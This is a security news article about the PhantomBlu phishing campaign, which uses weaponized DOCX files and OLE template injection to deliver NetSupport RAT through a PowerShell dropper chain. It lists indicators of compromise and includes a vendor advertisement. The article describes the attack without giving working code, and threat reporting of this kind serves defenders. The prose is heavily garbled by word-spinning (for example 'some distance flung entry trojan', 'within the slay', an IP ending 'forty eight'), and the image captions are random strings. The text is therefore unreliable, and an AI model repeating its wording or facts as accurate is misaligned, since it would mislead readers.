Operation PhantomBlu: Attackers Utilising Weaponized MS Office Doc to Hack Windows

Researchers from View Point identified a novel malware advertising campaign, PhantomBlu, concentrated on US organizations that use novel systems to deploy NetSupport RAT, a some distance flung entry trojan, by exploiting legitimate formula of Microsoft Order of job file templates thru OLE manipulation.

It permits the attackers to evade detection and form protect a watch on of sufferer machines for comparatively a pair of malicious activities, together with keylogging, file transfer, and lateral hump inside of the community.

EHA

Risk actors despatched phishing emails with unfounded month-to-month wage stories to entice workers into downloading malicious DOCX info that leveraged a legitimate electronic mail provide platform to avoid detection.

Upon opening the DOCX file, users had been suggested to enable enhancing and click on on an embedded OLE object disguised as a printer icon.

LcVw9xLolJO55KL7kDGAc6ESIchx — *Targets are ended in to enter the password “1” and to click on “Enable Bettering.”*

Clicking the icon ended in OLE template manipulation (T1221) to gain an archive containing a malicious LNK file, which is the main observed occasion of T1221 being aged to reveal NetSupport RAT.

Dissecting the Malware: From Entice to Control

Forensic analysis of a LNK file revealed a PowerShell dropper fetching a closely obfuscated script from a URL, which retrieved one more URL, downloaded a ZIP file, and unpacked it to attain the NetSupport RAT.

5zEsLw856Sai5q3GHjr3hvfJG 64FPLnXhR0SiIE4vpYeCMAHe9q pD9S0iFBPfDKILTivM9YZcNfd0eMCf4kIFCGm9bx0mZ0oSzV7Viinxh4FUrWF5XoSA05b4OxR TqtPCQp1eKuMeMDCVLotbTQ — *Inspecting the link’s code*

The script additionally created a persistence mechanism by together with a registry key for autostart, investigated bypassed user-agent gating on the secondary URL and confirmed the script’s functionality.

42FmmwoX8J0dsw6BDbuOlKLylRj Xty uwAxpD JYo40aIBebgO2YWzC EbCr4cNv3E4B94EsoV 8FqleMulOpOXYZPtiEpvQzIo8wsPfiIyHFPDaywu cBm0nfHKgIZnAoZbF6nCs8Q9rm8gyz5w — *Obfuscated PowerShell extracted from the URL*

The downloaded ZIP contained one more PowerShell script that within the slay dropped and performed NetSupport RAT (Client32.exe), revealing its C2 server infrastructure.

pF7jlgEpDSkqgB2zLTZk3 pUUSIuitWQIoupRPkx1Fx du9d6vQmXKGrlXHN9Eb7LqRxbbXjmQ8fvclS1UMOXt8gTIyjOk9eOMxT — *the NetSupport RAT’s C2 servers*

In maintaining with View Point, PhantomBlu delivers NetSupport RAT the use of a novel way. Encrypted .docs info act as carriers, exploiting OLE template injection (T1221) to reveal the payload.

Operation PhantomBlu: Attackers Utilising Weaponized MS Office Doc to Hack Windows 19 — *PhantomBlu “Attack Tree” unpacked by View Point’s developed detection engines*

It bypasses musty security by hiding the malicious code inside of the template, requiring user interplay for execution, which marks a shift from previous NetSupport RAT campaigns, which relied on total phishing ways and executable info.

The URLs embody parameters, some reference “.txt” info and additionally electronic mail message particulars, citing “sendinblue.com” and “sender-sib.com” within the message ID and return path, respectively.

The supplied knowledge appears to be Indicators of Compromise (IOCs) linked to a skill malware advertising campaign, together with hashes for comparatively a pair of file kinds (DOCX, ZIP, LNK, and EXE) listed alongside suspicious URLs, hostnames, and IP addresses.

Doc

Incorporate ANY.RUN into your firm for prompt and uncomplicated malware analysis

Are you from SOC, Risk Evaluate, or DFIR departments? If that is the case, it’s essential to to possibly perhaps well possibly be part of an on-line group of workers of 400,000 neutral security researchers:

Exact-time Detection
Interactive Malware Evaluation
Easy to Be taught by Unique Security Crew individuals
Get detailed stories with most info
Order Up Digital Machine in Linux & all Windows OS Variations
Work alongside with Malware Safely

Get a personalized demo of ANY.RUN to your security crew:

IOCs

Hashes (SHA-256)

Electronic mail – 16e6dfd67d5049ffedb8c55bee6ad80fc0283757bc60d4f12c56675b1da5bf61

Docx – 1abf56bc5fbf84805ed0fbf28e7f986c7bb2833972793252f3e358b13b638bb1

Injected ZIP – 95898c9abce738ca53e44290f4d4aa4e8486398de3163e3482f510633d50ee6c

LNK file – d07323226c7be1a38ffd8716bc7d77bdb226b81fd6ccd493c55b2711014c0188

Closing ZIP – 94499196a62341b4f1cd10f3e1ba6003d0c4db66c1eb0d1b7e66b7eb4f2b67b6

Client32.exe – 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1

URLs and Hostnames

yourownmart[.]com/solar[.]txt

firstieragency[.]com/depbrndksokkkdkxoqnazneifidmyyjdpji[.]txt

yourownmart[.]com

firstieragency[.]com

parabmasale[.]com

tapouttv28[.]com

IP Addresses

192[.]236[.]192[.]forty eight

173[.]252[.]167[.]50

199[.]188[.]205[.]15

46[.]105[.]141[.]54

Source credit : cybersecuritynews.com

cyber security cyber security news malware